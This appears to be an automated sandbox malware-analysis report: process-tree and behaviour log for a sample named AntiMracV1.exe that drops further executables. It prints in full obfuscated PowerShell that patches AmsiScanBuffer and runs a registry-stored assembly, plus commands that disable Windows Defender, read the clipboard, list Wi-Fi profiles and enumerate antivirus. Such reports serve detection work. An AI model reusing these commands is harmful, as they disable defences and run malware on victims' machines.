PID 1912 wrote to memory of 4680	1912	cmd.exe	226
PID 1912 wrote to memory of 4680	1912	cmd.exe	226
PID 2352 wrote to memory of 1512	2352	cmd.exe	222
PID 2352 wrote to memory of 1512	2352	cmd.exe	222
PID 2644 wrote to memory of 2188	2644	upinstall.exe	111
PID 2644 wrote to memory of 2188	2644	upinstall.exe	111
PID 2644 wrote to memory of 4940	2644	upinstall.exe	113
PID 2644 wrote to memory of 4940	2644	upinstall.exe	113
PID 2644 wrote to memory of 4584	2644	upinstall.exe	156
PID 2644 wrote to memory of 4584	2644	upinstall.exe	156
PID 2644 wrote to memory of 616	2644	upinstall.exe	115
PID 2644 wrote to memory of 616	2644	upinstall.exe	115
PID 2644 wrote to memory of 1648	2644	upinstall.exe	118
PID 2644 wrote to memory of 1648	2644	upinstall.exe	118
PID 2644 wrote to memory of 3092	2644	upinstall.exe	121
PID 2644 wrote to memory of 3092	2644	upinstall.exe	121
PID 2644 wrote to memory of 1256	2644	upinstall.exe	123
PID 2644 wrote to memory of 1256	2644	upinstall.exe	123
PID 2644 wrote to memory of 4712	2644	upinstall.exe	124
PID 2644 wrote to memory of 4712	2644	upinstall.exe	124
PID 2188 wrote to memory of 3552	2188	cmd.exe	126
PID 2188 wrote to memory of 3552	2188	cmd.exe	126
PID 4940 wrote to memory of 2348	4940	cmd.exe	128
PID 4940 wrote to memory of 2348	4940	cmd.exe	128
PID 4584 wrote to memory of 1576	4584	cmd.exe	152

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4104	attrib.exe
4956	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:640
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:428
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{dd48a197-e9a5-42d7-81bd-776ed51714e2}
  2⤵
  PID:2208
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d2c45f89-925d-405e-af36-e1d0bca93d9d}
  2⤵
  PID:4176

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:460

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zbPJCtrrJWBa{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CLnEmOtzwNoPRP,[Parameter(Position=1)][Type]$GCsKJPqGtW)$nhkvsRuRFQe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+[Char](108)+''+'e'+'ct'+'e'+''+[Char](100)+'D'+[Char](101)+'le'+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+''+'r'+'y'+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+'y'+''+[Char](112)+'e',''+[Char](67)+'la'+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+','+''+'A'+'n'+[Char](115)+''+[Char](105)+'C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+','+[Char](65)+'u'+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$nhkvsRuRFQe.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+'d'+[Char](101)+''+[Char](66)+'ySi'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$CLnEmOtzwNoPRP).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+'e'+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$nhkvsRuRFQe.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+'k'+'e',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+','+[Char](72)+'i'+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+'t'+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+'l'+'',$GCsKJPqGtW,$CLnEmOtzwNoPRP).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');Write-Output $nhkvsRuRFQe.CreateType();}$SkcPMiSukAYvA=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+'d'+''+'l'+'l')}).GetType(''+'M'+'i'+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+'t'+'i'+'v'+[Char](101)+''+'M'+''+[Char](101)+'t'+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$ifribzeGCnQgDM=$SkcPMiSukAYvA.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+'r'+''+[Char](111)+'c'+[Char](65)+''+'d'+''+'d'+''+[Char](114)+''+'e'+'ss',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+'S'+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UeKfgHvAtuwolHDSHQV=zbPJCtrrJWBa @([String])([IntPtr]);$lQmIIZDHQZxYDxfvjKjFGg=zbPJCtrrJWBa @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HylpBDKasDr=$SkcPMiSukAYvA.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+[Char](110)+'el32'+'.'+'d'+'l'+''+[Char](108)+'')));$dHcOSItwWFMhOO=$ifribzeGCnQgDM.Invoke($Null,@([Object]$HylpBDKasDr,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$qdMdwkMfyvVWPYVto=$ifribzeGCnQgDM.Invoke($Null,@([Object]$HylpBDKasDr,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+''+'u'+'a'+'l'+''+[Char](80)+''+[Char](114)+'o'+'t'+''+'e'+'ct')));$IvZrhVn=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dHcOSItwWFMhOO,$UeKfgHvAtuwolHDSHQV).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$CtOElDLDZwsvLRpfr=$ifribzeGCnQgDM.Invoke($Null,@([Object]$IvZrhVn,[Object]('A'+[Char](109)+'siS'+[Char](99)+'a'+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$zmmewxvGkW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qdMdwkMfyvVWPYVto,$lQmIIZDHQZxYDxfvjKjFGg).Invoke($CtOElDLDZwsvLRpfr,[uint32]8,4,[ref]$zmmewxvGkW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$CtOElDLDZwsvLRpfr,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qdMdwkMfyvVWPYVto,$lQmIIZDHQZxYDxfvjKjFGg).Invoke($CtOElDLDZwsvLRpfr,[uint32]8,0x20,[ref]$zmmewxvGkW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'ia'+[Char](108)+''+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+'a'+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  PID:1812
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:dRjBvxKDjDwN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$voWNixHfAPtPql,[Parameter(Position=1)][Type]$dBRjQKKsSa)$GyCThOnaXFC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+'e'+[Char](99)+''+[Char](116)+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+'d'+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+'l'+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+',Publi'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+'aled,'+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$GyCThOnaXFC.DefineConstructor('R'+[Char](84)+'Sp'+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+'d'+'e'+'B'+'y'+'S'+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$voWNixHfAPtPql).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+'e'+','+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$GyCThOnaXFC.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+'ke',''+'P'+'u'+'b'+''+[Char](108)+'i'+'c'+','+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$dBRjQKKsSa,$voWNixHfAPtPql).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'ag'+[Char](101)+''+[Char](100)+'');Write-Output $GyCThOnaXFC.CreateType();}$eYFwfDoIizAdB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+''+'.'+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'in'+[Char](51)+'2'+'.'+''+'U'+''+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+'i'+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$CyCBIkogqsSBGm=$eYFwfDoIizAdB.GetMethod('G'+[Char](101)+''+'t'+'P'+[Char](114)+''+[Char](111)+'c'+'A'+'d'+'d'+''+'r'+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'ubli'+[Char](99)+''+[Char](44)+'S'+'t'+''+[Char](97)+''+'t'+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WHjUWanDkEnhLgxcfGf=dRjBvxKDjDwN @([String])([IntPtr]);$bYTQicwqCKmvIjIPHFEKZu=dRjBvxKDjDwN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AdxMBbBxPtM=$eYFwfDoIizAdB.GetMethod(''+[Char](71)+'et'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'el'+[Char](51)+''+'2'+''+[Char](46)+'d'+'l'+''+[Char](108)+'')));$AWdYMMdkhrwvkS=$CyCBIkogqsSBGm.Invoke($Null,@([Object]$AdxMBbBxPtM,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+'r'+''+[Char](121)+'A')));$ygDyXdouVWMigoziX=$CyCBIkogqsSBGm.Invoke($Null,@([Object]$AdxMBbBxPtM,[Object](''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$HTQfsSt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AWdYMMdkhrwvkS,$WHjUWanDkEnhLgxcfGf).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$cwzUSVhThdXQofPdl=$CyCBIkogqsSBGm.Invoke($Null,@([Object]$HTQfsSt,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$LwafSXkXRQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ygDyXdouVWMigoziX,$bYTQicwqCKmvIjIPHFEKZu).Invoke($cwzUSVhThdXQofPdl,[uint32]8,4,[ref]$LwafSXkXRQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cwzUSVhThdXQofPdl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ygDyXdouVWMigoziX,$bYTQicwqCKmvIjIPHFEKZu).Invoke($cwzUSVhThdXQofPdl,[uint32]8,0x20,[ref]$LwafSXkXRQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'l'+[Char](101)+'rst'+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  PID:756
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1340

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1328
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2024

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1164

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1744

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2088

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2224

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2528

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2996

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1424

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3304
- C:\Users\Admin\AppData\Local\Temp\AntiMracV1.exe
  "C:\Users\Admin\AppData\Local\Temp\AntiMracV1.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4824
- - C:\Users\Admin\AppData\Local\Temp\AntiMracV1.exe
    "C:\Users\Admin\AppData\Local\Temp\AntiMracV1.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3396
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:444
  - - C:\Windows\SYSTEM32\reg.exe
      reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
      4⤵
      PID:3332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:396
  - - C:\Users\Admin\AppData\Local\Temp\updater_update.exe
      C:\Users\Admin\AppData\Local\Temp\updater_update.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1364
    - - C:\Users\Admin\AppData\Roaming\main.exe
        
        "C:\Users\Admin\AppData\Roaming\main.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5036
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3024
      - C:\Users\Admin\AppData\Roaming\main.exe
        
        "C:\Users\Admin\AppData\Roaming\main.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1872
    - - C:\Users\Admin\AppData\Roaming\drv.exe
        
        "C:\Users\Admin\AppData\Roaming\drv.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2052
      - C:\Users\Admin\AppData\Local\Temp\onefile_2052_133765893658789128\Loader2.exe
        
        "C:\Users\Admin\AppData\Roaming\drv.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:5004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\upinstall.exe
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2792
        
        C:\Users\Admin\AppData\upinstall.exe
        
        C:\Users\Admin\AppData\upinstall.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4904
        
        C:\Users\Admin\AppData\upinstall.exe
        
        C:\Users\Admin\AppData\upinstall.exe
        9⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\upinstall.exe'"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:3452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\upinstall.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:2352
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:1912
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:2188
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        10⤵
        Clipboard Data
        Suspicious use of WriteProcessMemory
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        11⤵
        Clipboard Data
        
        PID:2348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        
        PID:616
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        
        PID:3264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:4584
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:1576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        10⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1648
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        11⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        10⤵
        
        PID:3092
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        11⤵
        Gathers system information
        
        PID:4820
        
